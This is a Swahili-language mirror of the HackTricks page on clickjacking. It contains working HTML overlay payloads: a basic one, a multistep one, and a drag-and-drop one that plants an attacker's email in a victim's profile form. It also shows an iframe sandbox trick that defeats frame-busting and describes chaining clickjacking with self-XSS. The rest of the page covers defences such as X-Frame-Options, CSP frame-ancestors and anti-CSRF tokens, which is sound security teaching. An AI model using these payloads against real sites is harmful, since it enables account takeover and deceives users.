mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
225 lines
11 KiB
Markdown
225 lines
11 KiB
Markdown
# Clickjacking
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutomatisha mchakato** unaotumia zana za **jamii za hali ya juu zaidi**.\
|
|
Pata Ufikiaji Leo:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
## Ni nini Clickjacking
|
|
|
|
Katika shambulio la clickjacking, **mtumiaji** anadanganywa kuwa **bonyeza** kwenye **elementi** kwenye ukurasa wa wavuti ambao ni **nusuonekana** au umefichwa kama elementi tofauti. Udanganyifu huu unaweza kusababisha matokeo yasiyotarajiwa kwa mtumiaji, kama vile kupakua zisizo, kupelekwa kwenye kurasa za wavuti zenye nia mbaya, kutoa vibali au habari nyeti, uhamishaji wa pesa, au ununuzi wa bidhaa mtandaoni.
|
|
|
|
### Mbinu ya kujaza fomu kabla
|
|
|
|
Maranyingi inawezekana **kujaza thamani ya uga wa fomu kwa kutumia vigezo vya GET wakati wa kupakia ukurasa**. Mshambuliaji anaweza kutumia tabia hii kujaza fomu na data ya kupotosha na kutuma mzigo wa clickjacking ili mtumiaji abonyeze kitufe cha Kutuma.
|
|
|
|
### Jaza fomu kwa Drag\&Drop
|
|
|
|
Ikiwa unahitaji mtumiaji **kujaza fomu** lakini hauitaki moja kwa moja kumuuliza aandike habari fulani maalum (kama barua pepe au nenosiri maalum unalofahamu), unaweza kumwomba tu **Kuburuta&Kuachia** kitu ambacho kitaiandika data yako iliyodhibitiwa kama katika [**mfano huu**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
|
|
|
|
### Mzigo wa Msingi
|
|
```markup
|
|
<style>
|
|
iframe {
|
|
position:relative;
|
|
width: 500px;
|
|
height: 700px;
|
|
opacity: 0.1;
|
|
z-index: 2;
|
|
}
|
|
div {
|
|
position:absolute;
|
|
top:470px;
|
|
left:60px;
|
|
z-index: 1;
|
|
}
|
|
</style>
|
|
<div>Click me</div>
|
|
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
|
|
```
|
|
### Mzigo wa Hatua Nyingi
|
|
```markup
|
|
<style>
|
|
iframe {
|
|
position:relative;
|
|
width: 500px;
|
|
height: 500px;
|
|
opacity: 0.1;
|
|
z-index: 2;
|
|
}
|
|
.firstClick, .secondClick {
|
|
position:absolute;
|
|
top:330px;
|
|
left:60px;
|
|
z-index: 1;
|
|
}
|
|
.secondClick {
|
|
left:210px;
|
|
}
|
|
</style>
|
|
<div class="firstClick">Click me first</div>
|
|
<div class="secondClick">Click me next</div>
|
|
<iframe src="https://vulnerable.net/account"></iframe>
|
|
```
|
|
### Buruta\&Acha + Bofya mzigo
|
|
```markup
|
|
<html>
|
|
<head>
|
|
<style>
|
|
#payload{
|
|
position: absolute;
|
|
top: 20px;
|
|
}
|
|
iframe{
|
|
width: 1000px;
|
|
height: 675px;
|
|
border: none;
|
|
}
|
|
.xss{
|
|
position: fixed;
|
|
background: #F00;
|
|
}
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
|
|
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
|
|
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
|
|
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
|
|
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
|
|
</body>
|
|
</html>
|
|
```
|
|
### XSS + Clickjacking
|
|
|
|
Ikiwa umetambua **mshambulizi wa XSS ambao unahitaji mtumiaji kubonyeza** kwenye kipengele fulani ili **kuzindua** XSS na ukurasa huo ni **mdhaifu kwa clickjacking**, unaweza kutumia hilo kudanganya mtumiaji abonyeze kitufe/kiungo.
|
|
Mfano:
|
|
_Umeona **self XSS** katika baadhi ya maelezo ya siri ya akaunti (maelezo ambayo **wewe pekee unaweza kuweka na kusoma**). Ukurasa na **fomu** ya kuweka maelezo haya ni **mdhaifu** kwa **Clickjacking** na unaweza **kuweka tayari** **fomu** hiyo na vigezo vya GET._
|
|
\_\_Mshambulizi anaweza kuandaa shambulio la **Clickjacking** kwenye ukurasa huo **kuweka tayari** **fomu** na **XSS payload** na **kudanganya** **mtumiaji** abonyeze **Kuthibitisha** fomu. Hivyo, **wakati fomu inapotumwa** na thamani zinabadilishwa, **mtumiaji atatekeleza XSS**.
|
|
|
|
## Mikakati ya Kupunguza Hatari ya Clickjacking
|
|
|
|
### Ulinzi wa Upande wa Mteja
|
|
|
|
Scripts zilizotekelezwa upande wa mteja zinaweza kufanya hatua za kuzuia Clickjacking:
|
|
|
|
* Kuhakikisha dirisha la programu ndio dirisha kuu au la juu.
|
|
* Kufanya fremu zote ziwezekane.
|
|
* Kuzuia kubonyeza kwenye fremu zisizoonekana.
|
|
* Kugundua na kuonya watumiaji kuhusu majaribio ya Clickjacking.
|
|
|
|
Hata hivyo, hati hizi za kuvunja fremu zinaweza kuepukwa:
|
|
|
|
* **Mipangilio ya Usalama ya Vivinjari:** Baadhi ya vivinjari vinaweza kuzuia hati hizi kulingana na mipangilio yao ya usalama au kukosekana kwa msaada wa JavaScript.
|
|
* **Sifa ya HTML5 ya `sandbox` ya iframe:** Mshambulizi anaweza kufuta hati za kuvunja fremu kwa kuweka sifa ya `sandbox` na thamani za `allow-forms` au `allow-scripts` bila `allow-top-navigation`. Hii inazuia fremu kuhakiki ikiwa ni dirisha kuu, k.m.
|
|
```html
|
|
<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>
|
|
```
|
|
### Kinga za Upande wa Seva
|
|
|
|
#### X-Frame-Options
|
|
|
|
Kichwa cha majibu ya HTTP cha **`X-Frame-Options`** huijulisha vivinjari kuhusu uhalali wa kurejesha ukurasa katika `<frame>` au `<iframe>`, kusaidia kuzuia Clickjacking:
|
|
|
|
- `X-Frame-Options: deny` - Hakuna kikoa kinaweza kufunga yaliyomo.
|
|
- `X-Frame-Options: sameorigin` - Tovuti ya sasa pekee inaweza kufunga yaliyomo.
|
|
- `X-Frame-Options: allow-from https://trusted.com` - Kikoa kilichotajwa pekee 'uri' kinaweza kufunga ukurasa.
|
|
- Tafadhali kumbuka vikwazo: ikiwa kivinjari hakikubali agizo hili, huenda kisifanye kazi. Baadhi ya vivinjari hupendelea agizo la CSP la frame-ancestors.
|
|
|
|
#### Agizo la CSP la frame-ancestors katika Sera ya Usalama wa Yaliyomo (CSP)
|
|
|
|
**Agizo la `frame-ancestors` katika CSP** ndilo njia iliyopendekezwa ya kinga ya Clickjacking:
|
|
|
|
- `frame-ancestors 'none'` - Kama `X-Frame-Options: deny`.
|
|
- `frame-ancestors 'self'` - Kama `X-Frame-Options: sameorigin`.
|
|
- `frame-ancestors trusted.com` - Kama `X-Frame-Options: allow-from`.
|
|
|
|
Kwa mfano, CSP ifuatayo inaruhusu kufunga kutoka kwa kikoa kimoja tu:
|
|
|
|
`Content-Security-Policy: frame-ancestors 'self';`
|
|
|
|
Maelezo zaidi na mifano yenye utata inapatikana katika [hati ya frame-ancestors CSP](https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors) na [hati ya Mozilla ya frame-ancestors ya CSP](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors).
|
|
|
|
### Sera ya Usalama wa Yaliyomo (CSP) na `child-src` na `frame-src`
|
|
|
|
**Sera ya Usalama wa Yaliyomo (CSP)** ni hatua ya usalama inayosaidia kuzuia Clickjacking na mashambulizi mengine ya kuingiza nambari kwa kufafanua vyanzo vipi vivinjari vinapaswa kuruhusu kupakia yaliyomo.
|
|
|
|
#### Agizo la `frame-src`
|
|
|
|
- Hufafanua vyanzo halali kwa fremu.
|
|
- Ni maalum zaidi kuliko agizo la `default-src`.
|
|
```
|
|
Content-Security-Policy: frame-src 'self' https://trusted-website.com;
|
|
```
|
|
Sera hii inaruhusu fremu kutoka asili ile ile (self) na https://trusted-website.com.
|
|
|
|
#### Mwongozo wa `child-src`
|
|
|
|
* Kuletwa katika CSP kiwango cha 2 kuweka vyanzo halali kwa wafanyakazi wa wavuti na fremu.
|
|
* Inafanya kazi kama mbadala kwa frame-src na worker-src.
|
|
```
|
|
Content-Security-Policy: child-src 'self' https://trusted-website.com;
|
|
```
|
|
Hii sera inaruhusu fremu na wafanyikazi kutoka asili ile ile (self) na https://trusted-website.com.
|
|
|
|
**Maelezo ya Matumizi:**
|
|
|
|
* Kupitishwa: child-src inapitishwa kwa faida ya frame-src na worker-src.
|
|
* Tabia ya Mbali: Ikiwa frame-src haipo, child-src hutumiwa kama mbadala kwa fremu. Ikiwa zote mbili hazipo, default-src hutumiwa.
|
|
* Ufafanuzi wa Chanzo Imara: Jumuisha vyanzo vilivyothibitishwa tu katika maelekezo ili kuzuia unyanyasaji.
|
|
|
|
#### Scripts za JavaScript za Kuvunja Fremu
|
|
|
|
Ingawa sio kamili, scripts za kuvunja fremu zinazotegemea JavaScript zinaweza kutumika kuzuia ukurasa wa wavuti usifungwe kwenye fremu. Mfano:
|
|
```javascript
|
|
if (top !== self) {
|
|
top.location = self.location;
|
|
}
|
|
```
|
|
#### Kutumia Vyeti vya Anti-CSRF
|
|
|
|
* **Uthibitishaji wa Cheti:** Tumia vifaa vya anti-CSRF katika maombi ya wavuti ili kuhakikisha kuwa maombi yanayobadilisha hali yanafanywa kwa makusudi na mtumiaji na sio kupitia ukurasa ulio Clickjacked.
|
|
|
|
## Marejeo
|
|
|
|
* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
|
|
* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)
|
|
|
|
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa urahisi ikiwa na zana za **jamii ya juu zaidi** duniani.\
|
|
Pata Ufikiaji Leo:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|